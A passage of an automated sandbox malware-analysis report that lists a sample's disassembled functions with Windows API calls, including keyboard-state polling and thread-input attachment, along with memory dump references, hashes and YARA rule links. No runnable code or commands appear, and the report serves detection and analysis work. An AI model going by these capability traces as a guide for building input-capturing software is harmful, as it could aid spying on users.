                                                                                                                            APIs
                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                                                            • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1932665248-0
                                                                                                                            • Opcode ID: d6f42339ab3fa264365351f6c7f9bc6fbbd6feac36c871de3410b7a81864ab05
                                                                                                                            • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                                            • Opcode Fuzzy Hash: d6f42339ab3fa264365351f6c7f9bc6fbbd6feac36c871de3410b7a81864ab05
                                                                                                                            • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                                                            Function 004480F2 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                                                            • _memset.LIBCMT ref: 004481BA
                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                                                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                                                            • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                                                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$LongWindow_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 830647256-0
                                                                                                                            • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                            • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                                                            • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                            • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                                                            Function 0046EA7F Relevance: 16.7, APIs: 11, Instructions: 167windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                            • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                                                            • DeleteObject.GDI32(003D0000), ref: 0046EB4F
                                                                                                                            • DestroyIcon.USER32(004E0045), ref: 0046EB67
                                                                                                                            • DeleteObject.GDI32(95257051), ref: 0046EB7F
                                                                                                                            • DestroyWindow.USER32(00550000), ref: 0046EB97
                                                                                                                            • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                                                            • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 802431696-0
                                                                                                                            • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                            • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                                                                            • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                            • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                                                                            Function 00444D52 Relevance: 16.6, APIs: 11, Instructions: 132keyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                                                                            • GetKeyState.USER32(00000011), ref: 00444E77
                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                                                                            • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 541375521-0
                                                                                                                            • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                            • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                                                                            • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                            • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                                                                            Function 00474335 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 308COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 0-2761332787
                                                                                                                            • Opcode ID: 38821e03e5a839b94429ba2db428c7142abbc31d15341608f0900ebe89ef946b
                                                                                                                            • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                                                                                                            • Opcode Fuzzy Hash: 38821e03e5a839b94429ba2db428c7142abbc31d15341608f0900ebe89ef946b
                                                                                                                            • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                                                                                                            Function 004507E7 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                                                                            • _wcslen.LIBCMT ref: 00450944
                                                                                                                            • _wcscat.LIBCMT ref: 00450955
                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                                                                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                            • String ID: -----$SysListView32
                                                                                                                            • API String ID: 4008455318-3975388722
                                                                                                                            • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                            • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                                                                            • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                            • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                                                                            Function 00448602 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00448625
                                                                                                                            • CreateMenu.USER32 ref: 0044863C
                                                                                                                            • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                                                                            • IsMenu.USER32(?), ref: 004486EB
                                                                                                                            • CreatePopupMenu.USER32 ref: 004486F5
                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                                                                            • DrawMenuBar.USER32 ref: 00448742
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 176399719-4108050209
                                                                                                                            • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                            • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                                                                            • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                            • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                                                                            Function 004691F4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                                                                            • GetParent.USER32 ref: 004692A4
                                                                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                                                                            • GetParent.USER32 ref: 004692C7
                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 2040099840-1403004172
                                                                                                                            • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                            • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                                                            • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                            • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                                                            Function 004693F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                                                            • GetParent.USER32 ref: 0046949E
                                                                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                                                            • GetParent.USER32 ref: 004694C1
                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 2040099840-1403004172
                                                                                                                            • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                            • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                                                                            • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                            • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                                                                            Function 00448DAF Relevance: 15.2, APIs: 10, Instructions: 173windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                                                                            • SendMessageW.USER32(769523D0,00001001,00000000,00000000), ref: 00448E73
                                                                                                                            • SendMessageW.USER32(769523D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                                                              • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3771399671-0
                                                                                                                            • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                            • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                                                                            • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                            • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                                                                            Function 0046ECBF Relevance: 15.1, APIs: 10, Instructions: 101COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3413494760-0
                                                                                                                            • Opcode ID: 44a1e819814e3f0b97ca16996dc1dc3eb402023cf38fd38a03f085344c042abe
                                                                                                                            • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                                                                            • Opcode Fuzzy Hash: 44a1e819814e3f0b97ca16996dc1dc3eb402023cf38fd38a03f085344c042abe
                                                                                                                            • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                                                                            Function 004377B4 Relevance: 15.1, APIs: 10, Instructions: 97threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2156557900-0
                                                                                                                            • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                            • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                                                                            • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                            • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                                                                            Function 0045F776 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 446COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsicoll
                                                                                                                            • String ID: 0%d$DOWN$OFF
                                                                                                                            • API String ID: 3832890014-468733193
                                                                                                                            • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                            • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
